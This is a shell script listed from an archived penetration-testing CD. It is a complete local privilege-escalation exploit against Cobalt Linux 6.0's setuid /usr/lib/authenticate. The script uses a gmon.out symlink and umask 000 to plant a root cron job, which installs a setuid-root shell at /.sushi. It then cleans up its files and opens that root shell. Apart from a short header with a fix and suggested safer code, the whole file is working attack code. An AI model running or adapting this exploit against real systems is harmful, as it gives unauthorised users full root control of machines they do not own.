home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / RaQFuCK.sh

< prev

next >

Wrap

Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  3KB  |  141 lines

---

1. #!/bin/sh
2. #
3. # Cobalt Linux 6.0 Local Root Exploit
4. #
5. # Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
6. # Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
7. #
8. # Problem Source Code:
9. # fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
10. #
11. # Suggested Code:
12. # fd = mkstemp("/tmp/gmon.out-XXXXXX");
13. #
14. # Still need help Cobalt developers? Ok:
15. # man 3 tmpfile; man 2 open; echo "Thanks core"
16. #
17. # by Charles Stevenson <core@bokeoa.com>
18. #
19. # Fri Jun 28 03:35:53 MDT 2002
20. # - initial version
21. # Sun Jul 7 20:12:41 MDT 2002
22. # - added some features for robustness
23.  
24. echo "RaQFuCK.sh by core"
25.  
26. target="/usr/lib/authenticate"
27. tempdir="/tmp"
28.  
29. if [ -u /.sushi ] ; then
30.     exec /.sushi
31. fi
32.  
33. printf "Checking for $target..."
34. if [ -f "$target" ] ; then
35.     echo "done."
36. else
37.     echo "NO!"
38.     exit 1
39. fi
40.  
41. printf "Checking if $target is setuid root..."
42. if [ -u "$target" ] ; then
43.     echo "done."
44. else
45.     echo "NO! Hrm... does this admin have a clue???"
46.     exit 1
47. fi
48.  
49. if [ ! -d "$tempdir/core" ]; then
50.     printf "Creating $tempdir/core..."
51.     if ! mkdir "$tempdir/core" 2>/dev/null ; then
52.     echo "FAILED!" ; exit 1
53.     fi
54.     echo "done."
55. fi
56.  
57. printf "Changing directory to $tempdir/core..."
58. if ! cd "$tempdir/core" 2>/dev/null ; then
59.     echo "FAILED!" ; exit 1
60. else
61.     echo "done."
62. fi
63.  
64. printf "Creating cron.d symlink..."
65. if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
66.     echo "FAILED!" ; exit 1
67. else
68.     echo "done."
69. fi
70.  
71. printf "Changing umask..."
72. if ! umask 000 ; then
73.     echo "FAILED!" ; exit 1
74. else
75.     echo "done."
76. fi
77.  
78. printf "Compiling root shell..."
79. cat >sushi.c <<EOF
80. #include <unistd.h>
81. int main (int argc, char **argv, char **envp) {
82.     setuid(0);
83.     setgid(0);
84.     execve("/bin/sh",argv,envp);
85.     return -1;
86. }
87. EOF
88. if ! cc sushi.c -o sushi 2>/dev/null; then
89.     echo "FAILED!" ; exit 1
90. else
91.     echo "done."
92. fi
93.  
94. printf "Compiling cron takeover..."
95. cat >takeover.c <<EOF
96. #include <stdlib.h>
97. main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
98. EOF
99. if ! cc takeover.c -o own 2>/dev/null; then
100.     echo "FAILED!" ; exit 1
101. fi
102. echo "done."
103.  
104. printf "Performing symlink attack..."
105. printf "\n\n\n\n" | "$target"
106. if [ -u /etc/cron.d/core ] ; then
107.     echo "SYMLINK ATTACK FAILED!" && exit 1
108. else
109.     echo "done."
110. fi
111.  
112. printf "Setting up evil cron job..."
113. cat >croncore <<EOF
114. */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own";
115. fi
116. EOF
117. if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
118.     echo "FAILED!" ; exit 1
119. else
120.     echo "done."
121. fi
122.  
123. printf "Waiting for root shell"
124. while [ ! -u /.sushi ] ; do
125.     sleep 1 ; printf "."
126. done
127. echo "done."
128.  
129. cd /
130.  
131. printf "Cleaning up real quick..."
132. if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
133.     echo "FAILED??? Fuck it!"
134. else
135.     echo "done."
136. fi
137.  
138. echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
139. if ! exec /.sushi -i; then
140.     echo "Exec Failed!!! BUMMER!" ; exit 1
141. fi